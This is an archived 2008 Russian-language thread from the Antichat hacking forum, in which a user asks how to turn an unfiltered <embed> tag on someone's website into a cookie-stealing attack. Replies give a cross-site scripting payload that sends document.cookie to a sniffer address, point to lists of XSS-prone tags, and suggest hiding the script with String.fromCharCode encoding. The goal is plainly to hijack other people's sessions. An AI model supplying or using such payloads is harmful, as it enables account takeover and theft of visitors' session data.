Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   использование тега embed для угона cookies ? (https://forum.antichat.xyz/showthread.php?t=96287)

ickhz 14.12.2008 00:51

использование тега embed для угона cookies ?
 
Обнаружила, что на сайте на фильтруется тег <embed> и javascript в нем. ТО есть работает конструкция <embed src=javascript:alert('ok');this.avi>.. Подскажите, как прописать здесь скрипт, чтобы работала передача cookies на сниффер античата.

Pashkela 14.12.2008 00:53

также, как и обычно

Велемир 14.12.2008 01:06

Везде,где есть атрибут src,есть возможность эксплуатации XSS,не учитывая существования фильтров.

-m0rgan- 14.12.2008 01:07

В XSS не особо,но по моему так:
<embed src=javascript:src='адрес снифера';this.avi>

Велемир 14.12.2008 01:16

+document.cookie :D

-m0rgan- 14.12.2008 01:19

Бля,точно,пропустил:(
спс за поправку!

Велемир 14.12.2008 01:29

:):) Вообще,есть список *уязвимых* тегов касательно XSS.
http://www.inattack.ru/article/519.html к примеру,но был список и получше...

ickhz 15.12.2008 18:06

А, поняла, там фигня какая-то хитрая по-моему, которая не дает забрать cookies..

alert(document.cookies) выдает вместо cookies undefined

Типа защита такая что-ли))))

freddi 15.12.2008 19:31

ickhz, он это выдает тк нету такого объекта, как document.cookies, есть document.cookie.

iddqd 15.12.2008 19:34

попробуй прогнать скрипт через StringFromCharCode
http://pro.grammatic.org/post-javascript-eval-stringfromcharcode-encoder-11.aspx

ickhz 16.12.2008 15:15

Цитата:

Сообщение от freddi
ickhz, он это выдает тк нету такого объекта, как document.cookies, есть document.cookie.

Точно.. сорри! Теперь выводит пустой алерт.

ickhz 16.12.2008 15:25

Цитата:

Сообщение от iddqd
попробуй прогнать скрипт через StringFromCharCode
http://pro.grammatic.org/post-javascript-eval-stringfromcharcode-encoder-11.aspx

Спс

Велемир 21.12.2008 02:50

Естессно ничего не выведет,ибо пофиксено.

ickhz 29.12.2008 17:05

Да, к сожалению, именно так.. (


Время: 05:53